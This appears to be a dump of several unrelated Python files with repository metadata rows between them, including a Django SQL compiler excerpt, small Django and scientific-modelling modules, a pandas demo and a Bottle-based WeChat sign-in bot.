select_fields.append(len(select))
select.append((col, None))
klass_info['select_fields'] = select_fields
next_requested = requested.get(name, {})
next_klass_infos = self.get_related_selections(
select, opts=model._meta, root_alias=alias,
cur_depth=cur_depth + 1, requested=next_requested,
restricted=restricted,
)
get_related_klass_infos(klass_info, next_klass_infos)
fields_not_found = set(requested).difference(fields_found)
if fields_not_found:
invalid_fields = ("'%s'" % s for s in fields_not_found)
raise FieldError(
'Invalid field name(s) given in select_related: %s. '
'Choices are: %s' % (
', '.join(invalid_fields),
', '.join(_get_field_choices()) or '(none)',
)
)
return related_klass_infos
def get_select_for_update_of_arguments(self):
"""
Return a quoted list of arguments for the SELECT FOR UPDATE OF part of
the query.
"""
def _get_field_choices():
"""Yield all allowed field paths in breadth-first search order."""
queue = collections.deque([(None, self.klass_info)])
while queue:
parent_path, klass_info = queue.popleft()
if parent_path is None:
path = []
yield 'self'
else:
field = klass_info['field']
if klass_info['reverse']:
field = field.remote_field
path = parent_path + [field.name]
yield LOOKUP_SEP.join(path)
queue.extend(
(path, klass_info)
for klass_info in klass_info.get('related_klass_infos', [])
)
result = []
invalid_names = []
for name in self.query.select_for_update_of:
parts = [] if name == 'self' else name.split(LOOKUP_SEP)
klass_info = self.klass_info
for part in parts:
for related_klass_info in klass_info.get('related_klass_infos', []):
field = related_klass_info['field']
if related_klass_info['reverse']:
field = field.remote_field
if field.name == part:
klass_info = related_klass_info
break
else:
klass_info = None
break
if klass_info is None:
invalid_names.append(name)
continue
select_index = klass_info['select_fields'][0]
col = self.select[select_index][0]
if self.connection.features.select_for_update_of_column:
result.append(self.compile(col)[0])
else:
result.append(self.quote_name_unless_alias(col.alias))
if invalid_names:
raise FieldError(
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: %s.' % (
', '.join(invalid_names),
', '.join(_get_field_choices()),
)
)
return result
def deferred_to_columns(self):
"""
Convert the self.deferred_loading data structure to mapping of table
names to sets of column names which are to be loaded. Return the
dictionary.
"""
columns = {}
self.query.deferred_to_data(columns, self.query.get_loaded_field_names_cb)
return columns
def get_converters(self, expressions):
converters = {}
for i, expression in enumerate(expressions):
if expression:
backend_converters = self.connection.ops.get_db_converters(expression)
field_converters = expression.get_db_converters(self.connection)
if backend_converters or field_converters:
convs = []
for conv in (backend_converters + field_converters):
if func_supports_parameter(conv, 'context'):
warnings.warn(
'Remove the context parameter from %s.%s(). Support for it '
'will be removed in Django 3.0.' % (
conv.__self__.__class__.__name__,
conv.__name__,
),
RemovedInDjango30Warning,
)
conv = functools.partial(conv, context={})
convs.append(conv)
converters[i] = (convs, expression)
return converters
def apply_converters(self, rows, converters):
connection = self.connection
converters = list(converters.items())
for row in map(list, rows):
for pos, (convs, expression) in converters:
value = row[pos]
for converter in convs:
value = converter(value, expression, connection)
row[pos] = value
yield row
def results_iter(self, results=None, tuple_expected=False, chunked_fetch=False,
chunk_size=GET_ITERATOR_CHUNK_SIZE):
"""Return an iterator over the results from executing this query."""
if results is None:
results = self.execute_sql(MULTI, chunked_fetch=chunked_fetch, chunk_size=chunk_size)
fields = [s[0] for s in self.select[0:self.col_count]]
converters = self.get_converters(fields)
rows = chain.from_iterable(results)
if converters:
rows = self.apply_converters(rows, converters)
if tuple_expected:
rows = map(tuple, rows)
return rows
def has_results(self):
"""
Backends (e.g. NoSQL) can override this in order to use optimized
versions of "query has any results."
"""
# This is always executed on a query clone, so we can modify self.query
self.query.add_extra({'a': 1}, None, None, None, None, None)
self.query.set_extra_mask(['a'])
return bool(self.execute_sql(SINGLE))
def execute_sql(self, result_type=MULTI, chunked_fetch=False, chunk_size=GET_ITERATOR_CHUNK_SIZE):
"""
Run the query against the database and return the result(s). The
return value is a single data item if result_type is SINGLE, or an
iterator over the results if the result_type is MULTI.
result_type is either MULTI (use fetchmany() to retrieve all rows),
SINGLE (only retrieve a single row), or None. In this last case, the
cursor is returned if any query is executed, since it's used by
subclasses such as InsertQuery). It's possible, however, that no query
is needed, as the filters describe an empty set. In that case, None is
returned, to avoid any unnecessary database interaction.
"""
result_type = result_type or NO_RESULTS
try:
sql, params = self.as_sql()
if not sql:
raise EmptyResultSet
except EmptyResultSet:
if result_type == MULTI:
return iter([])
else:
return
if chunked_fetch:
cursor = self.connection.chunked_cursor()
else:
cursor = self.connection.cursor()
try:
cursor.execute(sql, params)
except Exception:
# Might fail for server-side cursors (e.g. connection closed)
cursor.close()
raise
if result_type == CURSOR:
# Give the caller the cursor to process and close.
return cursor
if result_type == SINGLE:
try:
val = cursor.fetchone()
if val:
return val[0:self.col_count]
return val
finally:
# done with the cursor
cursor.close()
if result_type == NO_RESULTS:
cursor.close()
return
result = cursor_iter(
cursor, self.connection.features.empty_fetchmany_value,
self.col_count if self.has_extra_select else None,
chunk_size,
)
if not chunked_fetch and not self.connection.features.can_use_chunked_reads:
try:
# If we are using non-chunked reads, we return the same data
# structure as normally, but ensure it is all read into memory
# before going any further. Use chunked_fetch if requested.
return list(result)
finally:
# done with the cursor
cursor.close()
return result
def as_subquery_condition(self, alias, columns, compiler):
qn = compiler.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
for index, select_col in enumerate(self.query.select):
lhs_sql, lhs_params = self.compile(select_col)
rhs = '%s.%s' % (qn(alias), qn2(columns[index]))
self.query.where.add(
QueryWrapper('%s = %s' % (lhs_sql, rhs), lhs_params), 'AND')
sql, params = self.as_sql()
return 'EXISTS (%s)' % sql, params
def explain_query(self):
result = list(self.execute_sql())
# Some backends return 1 item tuples with strings, and others return
# tuples with integers and strings. Flatten them out into strings.
for row in result[0]:
if not isinstance(row, str):
yield ' '.join(str(c) for c in row)
else:
yield row
class SQLInsertCompiler(SQLCompiler):
return_id = False
def field_as_sql(self, field, val):
"""
Take a field and a value intended to be saved on that field, and
return placeholder SQL and accompanying params. Check for raw values,
expressions, and fields with get_placeholder() defined in that order.
When field is None, consider the value raw and use it as the
placeholder, with no corresponding parameters returned.
"""
if field is None:
# A field value of None means the value is raw.
sql, params = val, []
elif hasattr(val, 'as_sql'):
# This is an expression, let's compile it.
sql, params = self.compile(val)
elif hasattr(field, 'get_placeholder'):
# Some fields (e.g. geo fields) need special munging before
# they can be inserted.
sql, params = field.get_placeholder(val, self, self.connection), [val]
else:
# Return the common case for the placeholder
sql, params = '%s', [val]
# The following hook is only used by Oracle Spatial, which sometimes
# needs to yield 'NULL' and [] as its placeholder and params instead
# of '%s' and [None]. The 'NULL' placeholder is produced earlier by
# OracleOperations.get_geom_placeholder(). The following line removes
# the corresponding None parameter. See ticket #10888.
params = self.connection.ops.modify_insert_params(sql, params)
return sql, params
def prepare_value(self, field, value):
"""
Prepare a value to be used in a query by resolving it if it is an
expression and otherwise calling the field's get_db_prep_save().
"""
if hasattr(value, 'resolve_expression'):
value = value.resolve_expression(self.query, allow_joins=False, for_save=True)
# Don't allow values containing Col expressions. They refer to
# existing columns on a row, but in the case of insert the row
# doesn't exist yet.
if value.contains_column_references:
raise ValueError(
'Failed to insert expression "%s" on %s. F() expressions '
'can only be used to update, not to insert.' % (value, field)
)
if value.contains_aggregate:
raise FieldError("Aggregate functions are not allowed in this query")
if value.contains_over_clause:
raise FieldError('Window expressions are not allowed in this query.')
else:
value = field.get_db_prep_save(value, connection=self.connection)
return value
def pre_save_val(self, field, obj):
"""
Get the given field's value off the given obj. pre_save() is used for
things like auto_now on DateTimeField. Skip it if this is a raw query.
"""
if self.query.raw:
return getattr(obj, field.attname)
return field.pre_save(obj, add=True)
def assemble_as_sql(self, fields, value_rows):
"""
Take a sequence of N fields and a sequence of M rows of values, and
generate placeholder SQL and parameters for each field and value.
Return a pair containing:
* a sequence of M rows of N SQL placeholder strings, and
* a sequence of M rows of corresponding parameter values.
Each placeholder string may contain any number of '%s' interpolation
strings, and each parameter row will contain exactly as many params
as the total number of '%s's in the corresponding placeholder row.
"""
if not value_rows:
return [], []
# list of (sql, [params]) tuples for each object to be saved
# Shape: [n_objs][n_fields][2]
rows_of_fields_as_sql = (
(self.field_as_sql(field, v) for field, v in zip(fields, row))
for row in value_rows
)
# tuple like ([sqls], [[params]s]) for each object to be saved
# Shape: [n_objs][2][n_fields]
sql_and_param_pair_rows = (zip(*row) for row in rows_of_fields_as_sql)
# Extract separate lists for placeholders and params.
# Each of these has shape [n_objs][n_fields]
placeholder_rows, param_rows = zip(*sql_and_param_pair_rows)
# Params for each field are still lists, and need to be flattened.
param_rows = [[p for ps in row for p in ps] for row in param_rows]
return placeholder_rows, param_rows
def as_sql(self):
# We don't need quote_name_unless_alias() here, since these are all
# going to be column names (so we can avoid the extra overhead).
qn = self.connection.ops.quote_name
opts = self.query.get_meta()
result = ['INSERT INTO %s' % qn(opts.db_table)]
fields = self.query.fields or [opts.pk]
result.append('(%s)' % ', '.join(qn(f.column) for f in fields))
if self.query.fields:
value_rows = [
[self.prepare_value(field, self.pre_save_val(field, obj)) for field in fields]
for obj in self.query.objs
]
else:
# An empty object.
value_rows = [[self.connection.ops.pk_default_value()] for _ in self.query.objs]
fields = [None]
# Currently the backends just accept values when generating bulk
# queries and generate their own placeholders. Doing that isn't
# necessary and it should be possible to use placeholders and
# expressions in bulk inserts too.
can_bulk = (not self.return_id and self.connection.features.has_bulk_insert)
placeholder_rows, param_rows = self.assemble_as_sql(fields, value_rows)
if self.return_id and self.connection.features.can_return_id_from_insert:
if self.connection.features.can_return_ids_from_bulk_insert:
result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
params = param_rows
else:
result.append("VALUES (%s)" % ", ".join(placeholder_rows[0]))
params = [param_rows[0]]
col = "%s.%s" % (qn(opts.db_table), qn(opts.pk.column))
r_fmt, r_params = self.connection.ops.return_insert_id()
# Skip empty r_fmt to allow subclasses to customize behavior for
# 3rd party backends. Refs #19096.
if r_fmt:
result.append(r_fmt % col)
params += [r_params]
return [(" ".join(result), tuple(chain.from_iterable(params)))]
if can_bulk:
result.append(self.connection.ops.bulk_insert_sql(fields, placeholder_rows))
return [(" ".join(result), tuple(p for ps in param_rows for p in ps))]
else:
return [
(" ".join(result + ["VALUES (%s)" % ", ".join(p)]), vals)
for p, vals in zip(placeholder_rows, param_rows)
]
def execute_sql(self, return_id=False):
assert not (
return_id and len(self.query.objs) != 1 and
not self.connection.features.can_return_ids_from_bulk_insert
)
self.return_id = return_id
with self.connection.cursor() as cursor:
for sql, params in self.as_sql():
cursor.execute(sql, params)
if not return_id:
return
if self.connection.features.can_return_ids_from_bulk_insert and len(self.query.objs) > 1:
return self.connection.ops.fetch_returned_insert_ids(cursor)
if self.connection.features.can_return_id_from_insert:
assert len(self.query.objs) == 1
return self.connection.ops.fetch_returned_insert_id(cursor)
return self.connection.ops.last_insert_id(
cursor, self.query.get_meta().db_table, self.query.get_meta().pk.column
)
class SQLDeleteCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
assert len([t for t in self.query.alias_map if self.query.alias_refcount[t] > 0]) == 1, \
"Can only delete from one table at a time."
qn = self.quote_name_unless_alias
result = ['DELETE FROM %s' % qn(self.query.base_table)]
where, params = self.compile(self.query.where)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(params)
class SQLUpdateCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
self.pre_sql_setup()
if not self.query.values:
return '', ()
qn = self.quote_name_unless_alias
values, update_params = [], []
for field, model, val in self.query.values:
if hasattr(val, 'resolve_expression'):
val = val.resolve_expression(self.query, allow_joins=False, for_save=True)
if val.contains_aggregate:
raise FieldError("Aggregate functions are not allowed in this query")
if val.contains_over_clause:
raise FieldError('Window expressions are not allowed in this query.')
elif hasattr(val, 'prepare_database_save'):
if field.remote_field:
val = field.get_db_prep_save(
val.prepare_database_save(field),
connection=self.connection,
)
else:
raise TypeError(
"Tried to update field %s with a model instance, %r. "
"Use a value compatible with %s."
% (field, val, field.__class__.__name__)
)
else:
val = field.get_db_prep_save(val, connection=self.connection)
# Getting the placeholder for the field.
if hasattr(field, 'get_placeholder'):
placeholder = field.get_placeholder(val, self, self.connection)
else:
placeholder = '%s'
name = field.column
if hasattr(val, 'as_sql'):
sql, params = self.compile(val)
values.append('%s = %s' % (qn(name), placeholder % sql))
update_params.extend(params)
elif val is not None:
values.append('%s = %s' % (qn(name), placeholder))
update_params.append(val)
else:
values.append('%s = NULL' % qn(name))
table = self.query.base_table
result = [
'UPDATE %s SET' % qn(table),
', '.join(values),
]
where, params = self.compile(self.query.where)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(update_params + params)
def execute_sql(self, result_type):
"""
Execute the specified update. Return the number of rows affected by
the primary update query. The "primary update query" is the first
non-empty query that is executed. Row counts for any subsequent,
related queries are not available.
"""
cursor = super().execute_sql(result_type)
try:
rows = cursor.rowcount if cursor else 0
is_empty = cursor is None
finally:
if cursor:
cursor.close()
for query in self.query.get_related_updates():
aux_rows = query.get_compiler(self.using).execute_sql(result_type)
if is_empty and aux_rows:
rows = aux_rows
is_empty = False
return rows
def pre_sql_setup(self):
"""
If the update depends on results from other tables, munge the "where"
conditions to match the format required for (portable) SQL updates.
If multiple updates are required, pull out the id values to update at
this point so that they don't change as a result of the progressive
updates.
"""
refcounts_before = self.query.alias_refcount.copy()
# Ensure base table is in the query
self.query.get_initial_alias()
count = self.query.count_active_tables()
if not self.query.related_updates and count == 1:
return
query = self.query.chain(klass=Query)
query.select_related = False
query.clear_ordering(True)
query._extra = {}
query.select = []
query.add_fields([query.get_meta().pk.name])
super().pre_sql_setup()
must_pre_select = count > 1 and not self.connection.features.update_can_self_select
# Now we adjust the current query: reset the where clause and get rid
# of all the tables we don't need (since they're in the sub-select).
self.query.where = self.query.where_class()
if self.query.related_updates or must_pre_select:
# Either we're using the idents in multiple update queries (so
# don't want them to change), or the db backend doesn't support
# selecting from the updating table (e.g. MySQL).
idents = []
for rows in query.get_compiler(self.using).execute_sql(MULTI):
idents.extend(r[0] for r in rows)
self.query.add_filter(('pk__in', idents))
self.query.related_ids = idents
else:
# The fast path. Filters and updates in one query.
self.query.add_filter(('pk__in', query))
self.query.reset_refcounts(refcounts_before)
class SQLAggregateCompiler(SQLCompiler):
def as_sql(self):
"""
Create the SQL for this query. Return the SQL string and list of
parameters.
"""
sql, params = [], []
for annotation in self.query.annotation_select.values():
ann_sql, ann_params = self.compile(annotation, select_format=FORCE)
sql.append(ann_sql)
params.extend(ann_params)
self.col_count = len(self.query.annotation_select)
sql = ', '.join(sql)
params = tuple(params)
sql = 'SELECT %s FROM (%s) subquery' % (sql, self.query.subquery)
params = params + self.query.sub_params
return sql, params
def cursor_iter(cursor, sentinel, col_count, itersize):
"""
Yield blocks of rows from a cursor and ensure the cursor is closed when
done.
"""
try:
for rows in iter((lambda: cursor.fetchmany(itersize)), sentinel):
yield rows if col_count is None else [r[:col_count] for r in rows]
finally:
cursor.close()
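# Hedged illustration (editor's addition, not part of Django): apply_converters()
# above threads each column value through its chain of converter callables, one
# row at a time. A minimal standalone sketch of the same pattern, with made-up
# converters (the real ones also receive the expression and connection):
def _demo_converter_chain():
    rows = [[b'1', '2019-01-01'], [b'2', '2019-02-01']]
    converters = {0: [int], 1: [lambda v: v.replace('-', '/')]}
    for row in rows:
        for pos, convs in converters.items():
            value = row[pos]
            for conv in convs:
                value = conv(value)
            row[pos] = value
        yield row
# list(_demo_converter_chain()) == [[1, '2019/01/01'], [2, '2019/02/01']]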
|
[
"[email protected]"
] | |
9f99434b0414a1ef779501b64fddd6cde711ca08
|
93022749a35320a0c5d6dad4db476b1e1795e318
|
/issm/giaivins.py
|
8b3e6e1be28e45ec640be9f57bc01bb251bc69f2
|
[
"BSD-3-Clause"
] |
permissive
|
pf4d/issm_python
|
78cd88e9ef525bc74e040c1484aaf02e46c97a5b
|
6bf36016cb0c55aee9bf3f7cf59694cc5ce77091
|
refs/heads/master
| 2022-01-17T16:20:20.257966 | 2019-07-10T17:46:31 | 2019-07-10T17:46:31 | 105,887,661 | 2 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,277 |
py
|
from issm.fielddisplay import fielddisplay
from issm.project3d import project3d
from issm.checkfield import checkfield
from issm.WriteData import WriteData
class giaivins(object):
"""
GIA class definition
Usage:
giaivins=giaivins();
"""
def __init__(self): # {{{
self.mantle_viscosity = float('NaN');
self.lithosphere_thickness = float('NaN');
self.cross_section_shape = 0;
#set defaults
self.setdefaultparameters()
#}}}
def __repr__(self): # {{{
string=' giaivins solution parameters:'
string="%s\n%s"%(string,fielddisplay(self,'mantle_viscosity','mantle viscosity constraints (NaN means no constraint) (Pa s)'))
string="%s\n%s"%(string,fielddisplay(self,'lithosphere_thickness','lithosphere thickness constraints (NaN means no constraint) (m)'))
string="%s\n%s"%(string,fielddisplay(self,'cross_section_shape',"1: square-edged, 2: elliptical-edged surface"))
return string
#}}}
def extrude(self,md): # {{{
self.mantle_viscosity=project3d(md,'vector',self.mantle_viscosity,'type','node')
self.lithosphere_thickness=project3d(md,'vector',self.lithosphere_thickness,'type','node')
return self
#}}}
def setdefaultparameters(self): # {{{
self.cross_section_shape=1;
return self
#}}}
def checkconsistency(self,md,solution,analyses): # {{{
# Early return
if ('GiaAnalysis' not in analyses):
return md
md = checkfield(md,'fieldname','gia.mantle_viscosity','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.lithosphere_thickness','NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
md = checkfield(md,'fieldname','gia.cross_section_shape','numel',[1],'values',[1,2])
#be sure that if we are running a masstransport ice flow model coupled with giaivins, that thickness forcings
#are not provided into the future.
return md
# }}}
def marshall(self,prefix,md,fid): # {{{
WriteData(fid,prefix,'object',self,'fieldname','mantle_viscosity','format','DoubleMat','mattype',1);
WriteData(fid,prefix,'object',self,'fieldname','lithosphere_thickness','format','DoubleMat','mattype',1,'scale',10.**3.);
WriteData(fid,prefix,'object',self,'fieldname','cross_section_shape','format','Integer');
# }}}
|
[
"[email protected]"
] | |
3db3cc00113a6fb614fa79bc5f0a9a2b4972075f
|
de17da755ea35e928afbaf48d41c23053e43af8a
|
/CourseSite/courses/migrations/0023_auto_20180426_1616.py
|
fa77713cabba30af89bec7958051af1a7c5157c2
|
[] |
no_license
|
m-gautam/Course_SIte-Project-
|
353aaec6695ca769cd16f38a0118ae4abc52bf9e
|
2b2cd1f3f4f85fec5c4b18355c111c67ce6dfcd0
|
refs/heads/master
| 2021-04-26T22:47:21.042398 | 2020-05-17T21:15:47 | 2020-05-17T21:15:47 | 124,147,812 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 580 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-26 16:16
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0022_auto_20180426_1615'),
]
operations = [
migrations.AlterField(
model_name='course',
name='prereq_courses',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=200), default='NULL', size=None),
),
]
|
[
"[email protected]"
] | |
ab2e70e575b38380a237025bcdbb447ce34fba5a
|
88eb514f6934c8b3e0a86f852f4202325a0546b7
|
/recepis/migrations/0002_rename_receitas_receita.py
|
a688a952255112952123cf68f9ae2fd4c30b680e
|
[] |
no_license
|
AllysonAbreu/projeto-pw
|
2859a90c4fbb75e26397e068327b1e7ad791f2a1
|
5e85935ccc6329d1234081541201cc6f0287741f
|
refs/heads/main
| 2023-09-01T05:02:31.127160 | 2021-09-16T23:08:58 | 2021-09-16T23:08:58 | 402,399,271 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 322 |
py
|
# Generated by Django 3.2.7 on 2021-09-02 17:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('recepis', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='Receitas',
new_name='Receita',
),
]
|
[
"Aoa3698741@_"
] |
Aoa3698741@_
|
b6683e488f292d0548f63346115c9b555ac19d7a
|
b7c1e5d140c3c41e86f206047145f7f296fed53a
|
/Textbook/Chapter 5/pandasSeriesVsDataFrame.py
|
e8417f1cc0a8b2c5317aff757d4ee250887236df
|
[
"MIT"
] |
permissive
|
jlcatonjr/Learn-Python-for-Stats-and-Econ
|
c2fbe29b324e70ceb832beafdd42d0accb37d9f9
|
194671592937562e08c92e0ef5f4793d4911701c
|
refs/heads/master
| 2023-05-11T17:17:05.934290 | 2023-05-10T20:12:10 | 2023-05-10T20:12:10 | 148,912,065 | 22 | 21 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
#pandasSeriesVsDataFrame.py
import numpy as np
import pandas as pd
dataDict = {"range":np.arange(10)}
dataSeries = pd.Series(dataDict)
print(dataSeries)
print(dataSeries["range"])
dataDF=pd.DataFrame(dataDict)
print(dataDF)
print(dataDF["range"])
print(dataDF["range"][5:9])
#print(dataDF.loc[5:9])
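# Editor's note (hedged addition): .loc is label-based and includes the end
# label, unlike the positional slice used above.
print(dataDF.loc[5:9])   # rows labelled 5 through 9, inclusive
print(dataDF.iloc[5:9])  # rows at positions 5 through 8, same as dataDF["range"][5:9]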
|
[
"[email protected]"
] | |
ba82f9b61b3eb06587fc5c2185adf9b9c041c8cf
|
bf33b8048d99eec4f693945d84f401ebe6083db2
|
/mybottle/sign/signup.py
|
d3f9f6c81e196105173160280a3cdb324ed8d510
|
[] |
no_license
|
yzhang3beatit/filesForServer
|
89f507937447511c12c6f9f35aa146b7619cbf42
|
eb7a551bc815c9f981ede01d058d9e0b6136971f
|
refs/heads/master
| 2021-01-19T05:10:50.982745 | 2016-07-21T06:28:50 | 2016-07-21T06:28:50 | 61,519,501 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,950 |
py
|
from bottle import route, run, request
import xml.etree.ElementTree as ET
from time import strftime, localtime, time, clock
from bisect import bisect_left
from xls.xls_record import get_records_from_xls, write_to_excel
mem_dir = '/home/y184zhan/tmp/'
readable = mem_dir+'xml_file.txt'
origin = mem_dir+'msg_file.txt'
KEYWORD = '1python'
def sec2str(secs):
return strftime("%Y-%m-%d %H:%M:%S", localtime(secs))
def parseXML(recvmsg):
# printToFile(recvmsg, origin, 'ba')
_str = byte2str(recvmsg)
# printToFile(_str, readable, 'a+')
root = ET.fromstring(_str)
msg = {}
for child in root:
if child.tag == 'CreateTime':
msg[child.tag] = sec2str(int(child.text))
else:
msg[child.tag] = child.text
return msg
textTpl = '''<xml>
<ToUserName><![CDATA[%s]]></ToUserName>
<FromUserName><![CDATA[%s]]></FromUserName>
<CreateTime>%s</CreateTime>
<MsgType><![CDATA[text]]></MsgType>
<Content><![CDATA[%s]]></Content>
</xml>'''
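# Hedged example (editor's addition): a filled-in message of the kind this
# template produces and parseXML() consumes; the user ids below are made up.
SAMPLE_MSG = textTpl % ('gh_service_account', 'oEXAMPLEOPENID',
                        str(int(time())), 'hello')
# parseXML(SAMPLE_MSG.encode()) -> {'ToUserName': 'gh_service_account', ...}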
def printToFile(msg, filepath, flag):
f = open(filepath, flag)
f.write(msg)
f.close()
def byte2str(utfByte):
_str = utfByte.decode()
# print(_str)
return _str
@route('/', method='POST')
def index():
start = clock()
openid = request.query.openid
# print("OPENID in FORMS:", openid)
# for l in request.body:
# print(l)
msg = parseXML(request.body.read())
echostr = build_echostr(msg)
end = clock()
print('Running time: %fs' %(end - start))
return echostr
DATA = []
DATA_INDEX = []
def main():
global DATA
global DATA_INDEX
DATA = read_data_file()
DATA_INDEX = [x[0] for x in DATA]
def read_data_file():
filename = './sign_record.xls'
datalist = get_records_from_xls(filename, 'Clear')
return datalist
def build_echostr(msg):
content = msg['Content'].strip()
welcome = u"Welcome to Coach Workroom"
if content == "print" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
welcome = u"Yes, Sir !\n"
data_list = [x[4] for x in DATA]
len_ = len(data_list) - 2
names = ',\n'.join(data_list)
welcome += str(len_) + '\n'
welcome += names
elif content == "save" and msg['FromUserName'] == "oPZW5t7_QdCpwjFK092Bn-iywx6s":
welcome = u"Yes, Sir !"
write_to_excel('result.xls', 'SIGN', len(DATA), 7, None, DATA)
elif content.lower() == 'update':
welcome = u"Please type in your ID\n(e.g. 10240148)"
update_data_clear(msg['FromUserName'])
elif KEYWORD in content:
user = update_data_sign(msg['FromUserName'], content, msg['CreateTime'])
if user: # user[4] == name:
if user[1]: # meno
welcome = u"%s, you have signed!" %user[4]
else:
welcome = u"Welcome to sign-in: %s" %user[4]
else:
welcome = u"Please type in Nokia ID:\n(e.g. 10240148)"
elif content.isdigit() and len(content) == 8:
welcome = u"Please type in your name\n(e.g. ZhangYang):"
update_data_nokiaid(msg['FromUserName'], content)
elif is_name(content):
welcome = u"Please type in keyword to sign-in"
update_data_name(msg['FromUserName'], content)
else:
user = update_data_find(msg['FromUserName'])
if user: # user[4] == name
if not user[4]:
welcome = u"Please type in your name\n(e.g. ZhangYang):"
elif user[1]: # user[1] == memo
welcome = u"%s, you have signed!" % user[4]
else:
welcome = u"%s, please type in keyword to sign" % user[4]
else:
welcome = u"Please sign up with your:\nNokiaID (e.g. 12345678)"
echostr = textTpl % (msg['FromUserName'], msg['ToUserName'], str(int(time())),
welcome)
# #print(DATA)
return echostr
def is_name(str_):
return str_.isalpha() and str_[0].isupper()
def update_data_clear(openid):
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
DATA[index][4] = ''
DATA[index][5] = ''
def update_data_find(openid):
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
return DATA[index]
def update_data_sign(openid, meno, timestamp):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', meno)
DATA[index][1] = meno
DATA[index][2] = timestamp
return DATA[index]
else:
new = [openid, meno, '', '', '', '', '']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
return
def update_data_name(openid, name):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', name)
if not DATA[index][4].strip():
DATA[index][4] = name
else:
new = [openid, '', '', '', name, '', ' ']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
def update_data_nokiaid(openid, nokiaid):
global DATA
global DATA_INDEX
index = bisect_left(DATA_INDEX, openid)
if index < len(DATA_INDEX) and DATA_INDEX[index] == openid:
# print('found openid for ', nokiaid)
if not DATA[index][5].strip():
DATA[index][5] = nokiaid
else:
new = [openid, '', '', '', '', nokiaid,' ']
DATA.insert(index, new)
DATA_INDEX.insert(index, openid)
'''
user = {'ID':msg['FromUserName'], 'Memo': msg['Content'], 'Name':msg['name'],
'Nokia ID':msg['nokiaid'], 'Department':msg['mdep'],
'TimeStamp':msg['CreateTime'], 'Sign':msg['Content']}
'''
if __name__ == "__main__":
main()
run(host='0.0.0.0', port=80)
|
[
"[email protected]"
] | |
e02299e147fabe086c8864cff41d59b0059baa48
|
4da0c8906c9cd671e3a4bee3a6ee801a353e3d9a
|
/Water/Water/urls.py
|
8ce00454b8099894f86046e7d4be2dfd650f7cf9
|
[] |
no_license
|
avpakh/GVK
|
2a5a699caa8a986a3fd0dadbe2160fc9da5bf193
|
ac8b8d8ad5cd5ef8485e98cd532a29cd420e0cae
|
refs/heads/master
| 2020-06-13T10:35:36.663668 | 2017-01-06T09:01:42 | 2017-01-06T09:01:42 | 75,392,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,335 |
py
|
"""Water URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from watres import urls as watres_url
from watstat import urls as watstat_url
from watres import views
from django.conf.urls.static import static
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$',views.index_view),
url(r'^watres/',include(watres_url)),
url(r'^watstat/',include(watstat_url)),
]
if settings.DEBUG:
if settings.MEDIA_ROOT:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += staticfiles_urlpatterns()
|
[
"[email protected]"
] | |
1cfd98dc3d88365f1d5b352e981615a2a6699195
|
cad76727b7e8f15abd7c65e9134f46c4e151f742
|
/Python/stan-irt.py
|
935b90138427857b3cf5d1d7800af1614b34ac80
|
[] |
no_license
|
AMBrown0/DataVizAss02
|
258e3b9d2f38791edf69dfcc9f78dc13400df256
|
22dcf219990540df9835d148f6c6c1219ad8aa15
|
refs/heads/main
| 2023-03-19T17:47:34.186892 | 2021-03-12T10:15:17 | 2021-03-12T10:15:17 | 276,904,746 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,085 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 12:07:25 2021
@author: andy
"""
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
